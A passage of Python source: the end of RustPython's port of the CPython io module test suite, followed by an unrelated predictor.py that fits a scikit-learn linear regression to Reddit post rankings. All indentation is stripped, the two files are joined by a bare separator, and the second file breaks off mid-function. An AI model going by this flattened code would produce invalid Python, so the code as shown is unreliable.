expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_constructor(self):
super().test_constructor()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_detach(self):
super().test_detach()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_encoding_read(self):
super().test_reconfigure_encoding_read()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_line_buffering(self):
super().test_reconfigure_line_buffering()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_basic_io(self):
super().test_basic_io()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_telling(self):
super().test_telling()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_uninitialized(self):
super().test_uninitialized()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_non_text_encoding_codecs_are_rejected(self):
super().test_non_text_encoding_codecs_are_rejected()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repr(self):
super().test_repr()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines_input(self):
super().test_newlines_input()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_one_by_one(self):
super().test_read_one_by_one()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_by_chunk(self):
super().test_read_by_chunk()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_1(self):
super().test_issue1395_1()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_2(self):
super().test_issue1395_2()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_3(self):
super().test_issue1395_3()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_4(self):
super().test_issue1395_4()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_5(self):
super().test_issue1395_5()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_through(self):
super().test_reconfigure_write_through()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_fromascii(self):
super().test_reconfigure_write_fromascii()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write(self):
super().test_reconfigure_write()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_non_seekable(self):
super().test_reconfigure_write_non_seekable()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_defaults(self):
super().test_reconfigure_defaults()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_newline(self):
super().test_reconfigure_newline()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
# XXX RUSTPYTHON: universal mode is deprecated anyway, so I
# feel fine about skipping it
# with support.check_warnings(('', DeprecationWarning)):
# f = self.open(os_helper.TESTFN, "U")
# self.assertEqual(f.name, os_helper.TESTFN)
# self.assertEqual(f.buffer.name, os_helper.TESTFN)
# self.assertEqual(f.buffer.raw.name, os_helper.TESTFN)
# self.assertEqual(f.mode, "U")
# self.assertEqual(f.buffer.mode, "rb")
# self.assertEqual(f.buffer.raw.mode, "rb")
# f.close()
f = self.open(os_helper.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(os_helper.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__# + ["IncrementalNewlineDecoder"] XXX RUSTPYTHON
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
predictor.py
|
from sklearn.linear_model import LinearRegression
from .score_filter import ScoreFilter
import time
from threading import Thread
from collections import defaultdict
class Predictor:
def __init__(self, db_collection):
self.collection = db_collection
self.score_filter = ScoreFilter(10000)
self.sub_weight = defaultdict(lambda: [0,1])
self.reset()
def gen_new_clf(self):
new_clf = LinearRegression()
data = self.collection.find({'time' : {'$lt': time.time() - (60 * 60 * 10)}})
seed_data = []
seed_results = []
for entry in data:
valid = True
for v in entry.values():
if v.__class__.__name__ == 'dict':
self.collection.remove({'id': entry['id']})
valid = False
break
if(valid):
top_pos = [entry['top_position']]
entry_id = entry['id']
entry['weight'] = self.sub_weight[entry['subreddit']][0] / self.sub_weight[entry['subreddit']][1]
entry.__delitem__('top_position')
entry.__delitem__('_id')
entry.__delitem__('id')
entry.__delitem__('subreddit')
entry.__delitem__('name_hash')
for v in entry.values():
if(v.__class__.__name__ != 'int' and v.__class__.__name__ != 'long' and v.__class__.__name__ != 'float'):
print('removing entry')
print(entry.values())
print(entry_id)
self.collection.remove({'id': entry_id})
valid = False
break
if(valid):
seed_results += [top_pos]
seed_data += [self.get_ordered_values(entry)]
new_clf.fit(seed_data, seed_results)
return new_clf
def training_filter(self, entry):
return True
def reset_sub_weight(self):
new_weight = defaultdict(lambda: [0,1])
data = self.collection.find({'time' : {'$lt': time.time() - (60 * 60 * 10)}})
for entry in data:
valid = True
for v in entry.values():
if v.__class__.__name__ == 'dict':
self.collection.remove({'id': entry['id']})
valid = False
break
if(valid):
if(entry['top_position'] < 100):
new_weight[entry['subreddit']][0]+=1
new_weight[entry['subreddit']][1]+=1
self.sub_weight = new_weight
def reset(self):
print("Resetting Predictor")
self.reset_sub_weight()
self.clf = self.gen_new_clf()
print("Reset Complete")
def async_reset(self):
reset_thread = Thread(target=self.reset, args=())
reset_thread.start()
def predict(self, entry_id):
entry = self.collection.find_one({'id': entry_id})
if(entry == None):
raise NameError('Entry with that ID could not be found.')
y_value = [entry['top_position']]
name = entry['id']
entry['weight'] = self.sub_weight[entry['subreddit']][0] / self.sub_weight[entry['subreddit']][1]
values = list(entry.values())
weight_str = "{0} / {1}".format(self.sub_weight[entry['subreddit']][0], self.sub_weight[entry['subreddit']][1])
entry.__delitem__('top_position')
entry.__delitem__('_id')
entry.__delitem__('id')
entry.__delitem__('subreddit')
entry.__delitem__('name_hash')
prediction = self.clf.predict([self.get_ordered_values(entry)])[0]
weight = self.score_filter.insert(name, prediction)
if(weight == 0):
print('============NEW LEADER============')
print(values)
print("{0}, {1}".format(prediction, weight))
print(weight_str)
print('==================================')
elif(weight < 0.001):
print('=========NEW Probably FP==========')
print(values)
print("{0}, {1}".format(prediction, weight))
print(weight_str)
print('==================================')
elif(weight < 0.50):
print(values)
print("{0}, {1}".format(prediction, weight))
print(weight_str)
